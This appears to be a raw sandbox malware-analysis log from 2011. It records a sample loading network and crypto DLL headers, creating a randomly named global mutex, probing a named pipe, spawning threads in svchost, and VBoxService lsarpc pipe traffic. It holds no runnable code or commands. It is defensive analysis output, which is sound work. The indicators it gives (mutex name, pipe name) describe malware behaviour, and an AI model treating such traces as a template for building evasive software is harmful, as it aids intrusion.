System info queried Type: BasicInformation success or wait 2078129489
System info queried Type: ProcessorInformation success or wait 2078129791
System info queried Type: BasicInformation success or wait 2078132576
System info queried Type: ProcessorInformation success or wait 2078132870
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078133283
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078134411
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078135124
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078135442
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078136320
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078137202
System info queried Type: BasicInformation success or wait 2078138027
System info queried Type: ProcessorInformation success or wait 2078138329
System info queried Type: BasicInformation success or wait 2078140984
System info queried Type: ProcessorInformation success or wait 2078141278
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078141691
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078142819
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078143483
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078143797
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078144721
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078145602
System info queried Type: BasicInformation success or wait 2078146524
System info queried Type: ProcessorInformation success or wait 2078146828
System info queried Type: BasicInformation success or wait 2078149414
System info queried Type: ProcessorInformation success or wait 2078149594
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078150444
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078151578
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078152247
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078152564
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078153445
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078154327
System info queried Type: BasicInformation success or wait 2078155198
System info queried Type: ProcessorInformation success or wait 2078155501
System info queried Type: BasicInformation success or wait 2078158146
System info queried Type: ProcessorInformation success or wait 2078158440
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078158857
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078159983
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078160649
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078160963
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078161841
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078162719
System info queried Type: BasicInformation success or wait 2078163425
System info queried Type: ProcessorInformation success or wait 2078163726
System info queried Type: BasicInformation success or wait 2078166562
System info queried Type: ProcessorInformation success or wait 2078166856
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078167268
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078168405
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078169382
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2078169723
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2078170608
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2078171487
System info queried Type: BasicInformation success or wait 2078172315
System info queried Type: ProcessorInformation success or wait 2078172618
System info queried Type: BasicInformation success or wait 2078174608
System info queried Type: ProcessorInformation success or wait 2078174904
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078175363
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078176499
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078177470
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2078177786
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2078178664
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2078179544
System info queried Type: BasicInformation success or wait 2078180370
System info queried Type: ProcessorInformation success or wait 2078180672
System info queried Type: BasicInformation success or wait 2078183354
System info queried Type: ProcessorInformation success or wait 2078183649
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078184060
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078185195
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078186211
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2078186528
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2078187406
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2078188285
System info queried Type: BasicInformation success or wait 2078189113
System info queried Type: ProcessorInformation success or wait 2078189414
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2078191540
Thread created PID: 1100 TID: 1984 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2078193078
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2078194768
Thread delayed Time: 0 TID: 4392 success or wait 2079045332
Thread delayed Time: 0 TID: 4392 success or wait 2079045840
Thread delayed Time: 0 TID: 4392 success or wait 2079046337
Thread delayed Time: 0 TID: 4392 success or wait 2080166726
Thread delayed Time: 0 TID: 4392 success or wait 2080167230
Thread delayed Time: 0 TID: 4392 success or wait 2080167713
Thread delayed Time: 0 TID: 4392 success or wait 2081291670
Thread delayed Time: 0 TID: 4392 success or wait 2081292076
Thread delayed Time: 0 TID: 4392 success or wait 2081292494
Thread delayed Time: 0 TID: 4392 success or wait 2082401152
Thread delayed Time: 0 TID: 4392 success or wait 2082401658
Thread delayed Time: 0 TID: 4392 success or wait 2082402154
Thread delayed Time: 0 TID: 4392 success or wait 2083519747
Thread delayed Time: 0 TID: 4392 success or wait 2083520251
Thread delayed Time: 0 TID: 4392 success or wait 2083520738
Thread delayed Time: 0 TID: 4392 success or wait 2084638083
Thread delayed Time: 0 TID: 4392 success or wait 2084638599
Thread delayed Time: 0 TID: 4392 success or wait 2084639097
Thread delayed Time: 0 TID: 4392 success or wait 2085756655
Thread delayed Time: 0 TID: 4392 success or wait 2085757185
Thread delayed Time: 0 TID: 4392 success or wait 2085757674
Thread delayed Time: 0 TID: 4392 success or wait 2086875583
Thread delayed Time: 0 TID: 4392 success or wait 2086876088
Thread delayed Time: 0 TID: 4392 success or wait 2086876594
Thread delayed Time: 0 TID: 4392 success or wait 2087994173
Thread delayed Time: 0 TID: 4392 success or wait 2087994690
Thread delayed Time: 0 TID: 4392 success or wait 2087995194
Thread delayed Time: 0 TID: 4392 success or wait 2089112795
Thread delayed Time: 0 TID: 4392 success or wait 2089113309
Thread delayed Time: 0 TID: 4392 success or wait 2089113802
Thread delayed Time: 0 TID: 4392 success or wait 2090231403
Thread delayed Time: 0 TID: 4392 success or wait 2090231910
Thread delayed Time: 0 TID: 4392 success or wait 2090232406
Thread delayed Time: 0 TID: 4392 success or wait 2091350795
Thread delayed Time: 0 TID: 4392 success or wait 2091351312
Thread delayed Time: 0 TID: 4392 success or wait 2091351816
Thread delayed Time: 0 TID: 4392 success or wait 2092468579
Thread delayed Time: 0 TID: 4392 success or wait 2092469110
Thread delayed Time: 0 TID: 4392 success or wait 2092469597
Thread delayed Time: 0 TID: 4392 success or wait 2093587239
Thread delayed Time: 0 TID: 4392 success or wait 2093587763
Thread delayed Time: 0 TID: 4392 success or wait 2093588266
Thread delayed Time: 0 TID: 4392 success or wait 2094705854
Thread delayed Time: 0 TID: 4392 success or wait 2094706368
Thread delayed Time: 0 TID: 4392 success or wait 2094706861
Thread delayed Time: 0 TID: 4392 success or wait 2095827722
Thread delayed Time: 0 TID: 4392 success or wait 2095828236
Thread created PID: 1100 TID: 2644 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2185819659
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2185831867
Thread created PID: 1100 TID: 3168 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2293048823
Thread created PID: 1100 TID: 3156 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2294165676
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2294167595
Analysis File: VBoxService.exe PID: 848 Parent PID: 692
+ Sections
+ General
Start time: 05:48:10
Start date: 01/12/2011
Path: C:\WINDOWS\system32\VBoxService.exe
Commandline: system32\VBoxService.exe
Imagebase:
File size: 1048880 bytes
MD5 hash: 99788E7204B94353FC7C06C5EB252EF1
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
\pipe\lsarpc read attributes and synchronize and generic read and generic write non directory file false success or wait 11 77E84B2A
\Device\Tcp6 generic execute no options false object name not found 55 76D6271D
\Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} read data or list directory and write data or add file and synchronize no options true success or wait 11 76D636DA
\Device\Afd\Endpoint synchronize and generic read and generic write synchronous io non alert true success or wait 11 71AB40EB
\Device\Tcp synchronize and generic execute synchronous io non alert true success or wait 11 71A92FB8
+ File written
File Path Offset Length Value Completion Count Source Address
\lsarpc 0 72 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 11 77E8081B
+ File read
File Path Offset Length Value Completion Count Source Address
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B3 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B5 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 BA 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FB 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FC 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FE 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 09 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 05 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 46 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4A 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4B 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 90 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 40 00 00 00 01 00 00 00 28 00 00 00 00 00 2C 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 0C 00 00 00 02 00 01 00 00 08 00 00 ........@.......(.....,......................................... pending 11 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 8C CF B7 70 78 03 DD 4B AA F9 70 A9 01 58 CA 27 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........px..K..p..X.'.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 8C CF B7 70 78 03 DD 4B AA F9 70 A9 01 58 CA 27 ........,......................px..K..p..X.' pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 C3 86 E7 21 03 51 1F 40 B4 5C 5F 2E 5A 37 BA 49 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........!.Q.@.\_.Z7.I.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 C3 86 E7 21 03 51 1F 40 B4 5C 5F 2E 5A 37 BA 49 ........,......................!.Q.@.\_.Z7.I pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 8A 0B B1 2E BB 0B 50 44 9E 5B F7 AD 85 13 4E 58 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9...........PD.[....NX.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 8A 0B B1 2E BB 0B 50 44 9E 5B F7 AD 85 13 4E 58 ........,.........................PD.[....NX pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 C2 53 85 65 8C 23 BF 45 A9 FB EC E0 DC 7B F1 F4 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9......S.e.#.E.....{...................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 C2 53 85 65 8C 23 BF 45 A9 FB EC E0 DC 7B F1 F4 ........,....................S.e.#.E.....{.. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 89 0E E5 5B B6 76 D9 4C B2 29 E8 EB A4 7D 72 FC 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........[.v.L.)...}r..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 89 0E E5 5B B6 76 D9 4C B2 29 E8 EB A4 7D 72 FC ........,......................[.v.L.)...}r. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 01 A5 50 8A 2F 8E 7D 4F A4 5D A0 51 0D 20 D3 D2 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.......P./.}O.].Q. ...................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 01 A5 50 8A 2F 8E 7D 4F A4 5D A0 51 0D 20 D3 D2 ........,.....................P./.}O.].Q. .. pending 1 77E81068
